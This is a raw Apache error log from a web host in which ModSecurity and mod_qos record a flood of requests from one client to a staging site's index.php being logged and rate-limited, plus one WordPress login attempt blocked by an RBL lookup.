[Tue May 26 19:59:53.335337 2026] [security2:error] [pid 93868:tid 94382] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX0qK9k_ZUB2Vp25_oAAAAgs"]
[Tue May 26 19:59:53.339362 2026] [security2:error] [pid 106517:tid 106703] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX4ZZc2DoU1lPnP1ToAAAALk"]
[Tue May 26 19:59:53.340862 2026] [security2:error] [pid 93868:tid 94356] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX0qK9k_ZUB2Vp25_oQAAAfE"]
[Tue May 26 19:59:53.341637 2026] [security2:error] [pid 93576:tid 93761] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYGDRMqfxdEDkosz2UwAAADE"]
[Tue May 26 19:59:53.342450 2026] [security2:error] [pid 106517:tid 106778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX4ZZc2DoU1lPnP1TmgAAAQQ"]
[Tue May 26 19:59:53.359929 2026] [security2:error] [pid 106517:tid 106669] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYIZZc2DoU1lPnP1TvQAAAJg"]
[Tue May 26 19:59:53.373931 2026] [security2:error] [pid 106517:tid 106723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuX4ZZc2DoU1lPnP1TnwAAAM0"]
[Tue May 26 19:59:53.376231 2026] [security2:error] [pid 106517:tid 106702] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYIZZc2DoU1lPnP1TswAAALg"]
[Tue May 26 19:59:53.384303 2026] [security2:error] [pid 93868:tid 94335] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYEqK9k_ZUB2Vp25_qwAAAdw"]
[Tue May 26 19:59:53.390354 2026] [security2:error] [pid 93576:tid 93806] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYGDRMqfxdEDkosz2bQAAAF4"]
[Tue May 26 19:59:53.404367 2026] [security2:error] [pid 93576:tid 93752] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYGDRMqfxdEDkosz2bgAAACg"]
[Tue May 26 19:59:53.414086 2026] [security2:error] [pid 93576:tid 93822] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYGDRMqfxdEDkosz2dAAAAG4"]
[Tue May 26 19:59:53.422898 2026] [security2:error] [pid 93576:tid 93807] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYGDRMqfxdEDkosz2egAAAF8"]
[Tue May 26 19:59:53.426928 2026] [security2:error] [pid 106517:tid 106741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYIZZc2DoU1lPnP1TyAAAAN8"]
[Tue May 26 19:59:53.435918 2026] [security2:error] [pid 93868:tid 94265] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYEqK9k_ZUB2Vp25_pwAAAZY"]
[Tue May 26 19:59:53.443574 2026] [security2:error] [pid 93576:tid 93788] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYGDRMqfxdEDkosz2kAAAAEw"]
[Tue May 26 19:59:53.448006 2026] [security2:error] [pid 106517:tid 106747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYIZZc2DoU1lPnP1TzwAAAOU"]
[Tue May 26 19:59:53.448957 2026] [security2:error] [pid 93576:tid 93768] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYGDRMqfxdEDkosz2dQAAADg"]
[Tue May 26 19:59:53.450985 2026] [security2:error] [pid 93576:tid 93835] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYGDRMqfxdEDkosz2awAAAHs"]
[Tue May 26 19:59:53.454734 2026] [security2:error] [pid 106517:tid 106663] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYIZZc2DoU1lPnP1TxAAAAJI"]
[Tue May 26 19:59:53.462559 2026] [security2:error] [pid 93576:tid 93805] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYGDRMqfxdEDkosz2swAAAF0"]
[Tue May 26 19:59:53.466647 2026] [security2:error] [pid 93576:tid 93782] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYGDRMqfxdEDkosz2eQAAAEY"]
[Tue May 26 19:59:53.467870 2026] [security2:error] [pid 93576:tid 93769] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYGDRMqfxdEDkosz2ewAAADk"]
[Tue May 26 19:59:53.738400 2026] [security2:error] [pid 93576:tid 93649] [remote 5.42.158.148:48358] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWuYWDRMqfxdEDkosz20gAADEU"]
[Tue May 26 19:59:53.976148 2026] [qos:error] [pid 106517:tid 106700] [client 45.148.10.120:58028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYYZZc2DoU1lPnP1URwAAALY
[Tue May 26 19:59:53.976685 2026] [qos:error] [pid 93576:tid 93762] [client 45.148.10.120:58000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYWDRMqfxdEDkosz3EwAAADI
[Tue May 26 19:59:53.977472 2026] [qos:error] [pid 93576:tid 93712] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuYWDRMqfxdEDkosz3FAAAAAA
[Tue May 26 19:59:54.072867 2026] [qos:error] [pid 106517:tid 106726] [client 45.148.10.120:58044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYoZZc2DoU1lPnP1UTQAAANA
[Tue May 26 19:59:54.091223 2026] [qos:error] [pid 93576:tid 93746] [client 45.148.10.120:58064] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYmDRMqfxdEDkosz3FwAAACI
[Tue May 26 19:59:54.093314 2026] [qos:error] [pid 106517:tid 106657] [client 45.148.10.120:58084] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYoZZc2DoU1lPnP1UTgAAAIw
[Tue May 26 19:59:54.098133 2026] [qos:error] [pid 93576:tid 93757] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYmDRMqfxdEDkosz3GAAAAC0
[Tue May 26 19:59:54.100515 2026] [qos:error] [pid 106517:tid 106760] [client 45.148.10.120:58056] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYoZZc2DoU1lPnP1UTwAAAPI
[Tue May 26 19:59:54.103327 2026] [qos:error] [pid 106517:tid 106691] [client 45.148.10.120:58098] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYoZZc2DoU1lPnP1UUAAAAK0
[Tue May 26 19:59:54.121661 2026] [qos:error] [pid 93576:tid 93805] [client 45.148.10.120:58114] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYmDRMqfxdEDkosz3GQAAAF0
[Tue May 26 19:59:54.130364 2026] [qos:error] [pid 93576:tid 93774] [client 45.148.10.120:57996] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYmDRMqfxdEDkosz3GgAAAD4
[Tue May 26 19:59:54.131035 2026] [qos:error] [pid 93576:tid 93796] [client 45.148.10.120:58000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYmDRMqfxdEDkosz3GwAAAFQ
[Tue May 26 19:59:54.134006 2026] [qos:error] [pid 106517:tid 106763] [client 45.148.10.120:58028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYoZZc2DoU1lPnP1UUQAAAPU
[Tue May 26 19:59:54.228483 2026] [qos:error] [pid 106517:tid 106737] [client 45.148.10.120:58044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYoZZc2DoU1lPnP1UWgAAANs
[Tue May 26 19:59:54.242391 2026] [qos:error] [pid 93576:tid 93770] [client 45.148.10.120:58064] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYmDRMqfxdEDkosz3HQAAADo
[Tue May 26 19:59:54.243063 2026] [qos:error] [pid 106517:tid 106714] [client 45.148.10.120:58084] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYoZZc2DoU1lPnP1UWwAAAMQ
[Tue May 26 19:59:54.249360 2026] [qos:error] [pid 93576:tid 93803] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYmDRMqfxdEDkosz3HgAAAFs
[Tue May 26 19:59:54.256704 2026] [qos:error] [pid 106517:tid 106652] [client 45.148.10.120:58098] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYoZZc2DoU1lPnP1UXAAAAIc
[Tue May 26 19:59:54.257037 2026] [qos:error] [pid 106517:tid 106671] [client 45.148.10.120:58056] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYoZZc2DoU1lPnP1UXQAAAJo
[Tue May 26 19:59:54.275163 2026] [security2:error] [pid 106517:tid 106748] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYIZZc2DoU1lPnP1TyQAAAOY"]
[Tue May 26 19:59:54.286153 2026] [qos:error] [pid 93576:tid 93724] [client 45.148.10.120:58000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYmDRMqfxdEDkosz3IgAAAAw
[Tue May 26 19:59:54.288308 2026] [qos:error] [pid 106517:tid 106767] [client 45.148.10.120:58028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYoZZc2DoU1lPnP1UYQAAAPk
[Tue May 26 19:59:54.289035 2026] [security2:error] [pid 93576:tid 93754] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYGDRMqfxdEDkosz2igAAACo"]
[Tue May 26 19:59:54.291105 2026] [security2:error] [pid 93576:tid 93721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYGDRMqfxdEDkosz2ogAAAAk"]
[Tue May 26 19:59:54.309208 2026] [security2:error] [pid 106517:tid 106698] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYIZZc2DoU1lPnP1TzgAAALQ"]
[Tue May 26 19:59:54.321420 2026] [security2:error] [pid 93576:tid 93797] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYGDRMqfxdEDkosz2pgAAAFU"]
[Tue May 26 19:59:54.324288 2026] [security2:error] [pid 93576:tid 93830] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYWDRMqfxdEDkosz2zQAAAHY"]
[Tue May 26 19:59:54.327859 2026] [security2:error] [pid 106517:tid 106715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYIZZc2DoU1lPnP1T0AAAAMU"]
[Tue May 26 19:59:54.330429 2026] [security2:error] [pid 106517:tid 106721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYIZZc2DoU1lPnP1T6gAAAMs"]
[Tue May 26 19:59:54.333645 2026] [security2:error] [pid 106517:tid 106761] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYIZZc2DoU1lPnP1T3AAAAPM"]
[Tue May 26 19:59:54.336556 2026] [security2:error] [pid 106517:tid 106762] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYYZZc2DoU1lPnP1UDgAAAPQ"]
[Tue May 26 19:59:54.340328 2026] [security2:error] [pid 106517:tid 106654] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYIZZc2DoU1lPnP1TywAAAIk"]
[Tue May 26 19:59:54.341662 2026] [security2:error] [pid 106517:tid 106655] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYYZZc2DoU1lPnP1T-QAAAIo"]
[Tue May 26 19:59:54.346352 2026] [security2:error] [pid 93576:tid 93794] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYGDRMqfxdEDkosz2iAAAAFI"]
[Tue May 26 19:59:54.351175 2026] [security2:error] [pid 93576:tid 93729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYWDRMqfxdEDkosz2xgAAABE"]
[Tue May 26 19:59:54.351748 2026] [security2:error] [pid 93576:tid 93789] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYGDRMqfxdEDkosz2mAAAAE0"]
[Tue May 26 19:59:54.361943 2026] [security2:error] [pid 106517:tid 106660] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYIZZc2DoU1lPnP1TzAAAAI8"]
[Tue May 26 19:59:54.371665 2026] [security2:error] [pid 93576:tid 93811] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYWDRMqfxdEDkosz2zwAAAGM"]
[Tue May 26 19:59:54.389953 2026] [security2:error] [pid 106517:tid 106665] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYYZZc2DoU1lPnP1UDwAAAJQ"]
[Tue May 26 19:59:54.396966 2026] [security2:error] [pid 93576:tid 93734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYGDRMqfxdEDkosz2tQAAABY"]
[Tue May 26 19:59:54.403744 2026] [security2:error] [pid 93576:tid 93743] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYWDRMqfxdEDkosz25wAAAB8"]
[Tue May 26 19:59:54.406676 2026] [security2:error] [pid 93576:tid 93773] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYWDRMqfxdEDkosz2zgAAAD0"]
[Tue May 26 19:59:54.406758 2026] [security2:error] [pid 93576:tid 93736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYWDRMqfxdEDkosz22gAAABg"]
[Tue May 26 19:59:54.412579 2026] [security2:error] [pid 93576:tid 93772] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYWDRMqfxdEDkosz22QAAADw"]
[Tue May 26 19:59:54.417828 2026] [security2:error] [pid 93576:tid 93821] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYWDRMqfxdEDkosz25gAAAG0"]
[Tue May 26 19:59:54.422951 2026] [security2:error] [pid 93576:tid 93825] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYWDRMqfxdEDkosz22AAAAHE"]
[Tue May 26 19:59:54.425825 2026] [security2:error] [pid 93576:tid 93786] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYWDRMqfxdEDkosz20AAAAEo"]
[Tue May 26 19:59:54.431867 2026] [security2:error] [pid 106517:tid 106770] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYYZZc2DoU1lPnP1UOAAAAPw"]
[Tue May 26 19:59:54.432821 2026] [security2:error] [pid 106517:tid 106694] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYYZZc2DoU1lPnP1UHQAAALA"]
[Tue May 26 19:59:54.439177 2026] [security2:error] [pid 93576:tid 93836] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYWDRMqfxdEDkosz3CQAAAHw"]
[Tue May 26 19:59:54.442654 2026] [security2:error] [pid 93576:tid 93739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYWDRMqfxdEDkosz3BAAAABs"]
[Tue May 26 19:59:54.451386 2026] [security2:error] [pid 106517:tid 106727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYYZZc2DoU1lPnP1UPwAAANE"]
[Tue May 26 19:59:54.459969 2026] [security2:error] [pid 106517:tid 106709] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYYZZc2DoU1lPnP1UOwAAAL8"]
[Tue May 26 19:59:54.592555 2026] [qos:error] [pid 93576:tid 93787] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYmDRMqfxdEDkosz3UwAAAEs
[Tue May 26 19:59:54.593289 2026] [qos:error] [pid 93576:tid 93787] [client 45.148.10.120:57874] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYmDRMqfxdEDkosz3VAAAAEs
[Tue May 26 19:59:54.595605 2026] [qos:error] [pid 106517:tid 106770] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuYoZZc2DoU1lPnP1UpQAAAPw
[Tue May 26 19:59:54.595947 2026] [qos:error] [pid 93576:tid 93761] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYmDRMqfxdEDkosz3VQAAADE
